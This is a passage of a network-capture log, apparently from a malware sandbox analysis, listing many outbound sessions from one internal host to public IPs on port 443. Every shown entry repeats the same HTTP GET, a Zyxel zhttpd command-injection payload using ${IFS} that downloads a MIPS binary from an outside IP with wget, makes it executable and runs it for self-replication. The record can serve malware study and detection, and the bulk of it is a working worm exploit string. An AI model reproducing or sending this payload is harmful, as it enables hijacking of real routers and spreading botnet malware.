                                                Jan 12, 2024 18:16:16.278204918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2692192.168.2.233971285.7.131.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278234005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2693192.168.2.234925680.98.199.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278281927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2694192.168.2.23386881.134.248.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278332949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2695192.168.2.2333816141.185.38.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278362989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2696192.168.2.2338958192.206.209.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278377056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2697192.168.2.2340224124.160.10.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278424978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2698192.168.2.2354360187.226.99.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278471947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2699192.168.2.2350336187.58.161.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278523922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2700192.168.2.234617880.217.113.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278565884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2701192.168.2.234735838.212.201.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278621912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2702192.168.2.234462066.114.222.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278646946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2703192.168.2.2342792164.223.111.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278700113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2704192.168.2.2344014155.216.4.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278747082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2705192.168.2.2346042184.162.204.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278767109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2706192.168.2.235108820.109.180.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278798103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2707192.168.2.235895644.205.75.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278832912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2708192.168.2.2334080170.92.122.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278882980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2709192.168.2.2338152136.220.10.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278913975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2710192.168.2.234698265.122.7.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.278975964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2711192.168.2.2352184115.107.8.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279016972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2712192.168.2.2355962112.4.89.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279055119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2713192.168.2.2340702156.179.148.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279110909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2714192.168.2.2335486106.81.47.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279150963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2715192.168.2.233438251.50.142.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279194117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2716192.168.2.2346934131.32.171.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279246092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2717192.168.2.236047413.150.195.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279266119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2718192.168.2.2354418149.177.96.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279318094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2719192.168.2.23474189.115.253.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279376984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2720192.168.2.236028837.134.206.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279409885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2721192.168.2.234090269.32.218.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279459953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2722192.168.2.2354720128.93.90.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279520988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2723192.168.2.233643879.34.191.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279552937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2724192.168.2.2338058142.61.100.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279588938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2725192.168.2.234661636.146.237.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279619932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2726192.168.2.234334836.224.209.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279678106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2727192.168.2.235001842.103.120.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279696941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2728192.168.2.2335194203.147.50.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279736042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2729192.168.2.235196819.139.252.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279764891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2730192.168.2.2349182189.111.64.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279813051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2731192.168.2.234300274.206.111.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279855967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2732192.168.2.235270289.183.137.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279896021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2733192.168.2.2352280186.228.99.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279934883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2734192.168.2.2337116160.9.94.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.279979944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2735192.168.2.2358572183.225.41.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280013084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2736192.168.2.2349898110.12.149.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280067921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2737192.168.2.235230654.229.22.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280118942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2738192.168.2.234901431.46.67.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280158997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2739192.168.2.2336206174.232.60.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280193090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2740192.168.2.2353910189.207.131.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280236959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2741192.168.2.2353838202.194.98.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280286074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2742192.168.2.2345386174.32.157.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280312061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2743192.168.2.2343256100.16.218.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280364037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2744192.168.2.233786059.223.32.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280392885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2745192.168.2.234633866.36.71.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280417919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2746192.168.2.235032820.129.151.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280466080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2747192.168.2.2345402114.129.140.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280503988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2748192.168.2.235402477.21.207.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280546904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2749192.168.2.2346956133.149.138.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280582905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2750192.168.2.2359256169.75.204.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280637026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2751192.168.2.234507632.222.150.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280662060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2752192.168.2.2359424102.139.157.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280698061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2753192.168.2.2352686176.108.164.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.280754089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2754192.168.2.2356828217.116.76.216443
                                                TimestampBytes transferredDirectionData
